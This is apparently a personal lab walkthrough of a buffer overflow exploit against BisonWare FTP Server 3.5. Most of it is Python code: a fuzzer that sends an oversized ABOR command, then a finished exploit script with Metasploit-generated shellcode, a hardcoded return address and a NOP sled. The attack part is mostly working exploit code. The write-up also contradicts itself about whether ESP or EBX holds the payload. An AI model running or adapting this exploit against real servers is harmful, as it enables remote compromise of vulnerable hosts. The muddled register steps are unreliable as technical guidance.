codename scx030c06c

Buffer overflow : direct return exploit BisonWare FTP Server V3.5

1. open application bisonWare FTP

2. test connection with nc

3. create fuzzer script with python

import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*100
buffer+= "\r\n"
s.connect(('192.168.56.101',21))
print "Connecting...."
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."

4. test sending fuzzer, start with *100, *200, *300, until target crash

5. target crash in *1600


6. open target from OllyDbg to begin debugging

7. try sending fuzzer again



8. look the EIP, it contains character 41414141 from fuzzer

9. create pattern and insert into fuzzer script



10. open target with OllyDbg and send fuzzer again



11. copy EIP register and find offset with pattern_offset.rb



12. edit the script to determine EIP location
   buffer+="BBBB"
13. open target with OllyDbg and send fuzzer again

14. now EIP is under control



different from previous target, in this target i'm not using ESP register to put payload, i will use EBX. why? because the EBX is overflowed with fuzzer data while ESP is not. right click the ESP > follow in dump. there are big enough space to put payload.



15. find JUMP ESP command and copy the address into fuzzer script
buffer+="\x0B\xFD\xA6\x7C"

16. add breakpoint to the address of JMP EBX

17. open target with OllyDbg and send fuzzer again

18. EIP address is successfully overwritten by JMP EBX address



19. now generate the payload with msfweb, choose windows execute command > calc



20. copy payload script to the fuzzer script

import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
payload=("\xda\xdf\x33\xc9\xbf\xa0\xf7\x50\x16\xb1\x23\xd9\x74\x24\xf4\x5b"
"\x31\x7b\x17\x03\x7b\x17\x83\x63\xf3\xb2\xe3\x9f\x14\x76\x0c\x5f"
"\xe5\xfc\x49\x63\x6e\x7e\x57\xe3\x71\x90\xdc\x5c\x6a\xe5\xbc\x42"
"\x8b\x12\x0b\x09\xbf\x6f\x8d\xe3\xf1\xaf\x17\x57\x75\xef\x5c\xa0"
"\xb7\x3a\x91\xaf\xf5\x50\x5e\x94\xad\x82\x9b\x9f\xa8\x40\xfc\x7b"
"\x32\xbc\x65\x08\x38\x09\xe1\x51\x5d\x8c\x1e\xe6\x41\x05\xe1\x13"
"\xf0\x45\xc6\xe7\xc0\x47\xc6\x83\x4d\xe7\xf6\xce\x92\x90\xfa\x5b"
"\x52\x6d\x88\x2b\x4f\xc0\x05\xa3\x67\xf1\x13\xb8\xf8\xb5\x24\xbe"
"\xf8\x3e\x4c\x82\xa7\x71\x7b\x9a\x01\xfb\x7b\xd9\x6e\x80\x2b\xb5"
"\x10\xaf\x2e\x36\x85\xd7\x51\x32\x5b\xbf\x52\xa5\x07\x5e\xc1\x4a"
"\xc8")
buffer = "\x41"*1191 + "\x0B\xFD\xA6\x7C" + "\x90"*90 + payload+'\r\n'
print "Connecting...."
s.connect(('192.168.56.101',21))
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."

21. open target without OllyDbg and send fuzzer again

22. Voila! the target has been exploited!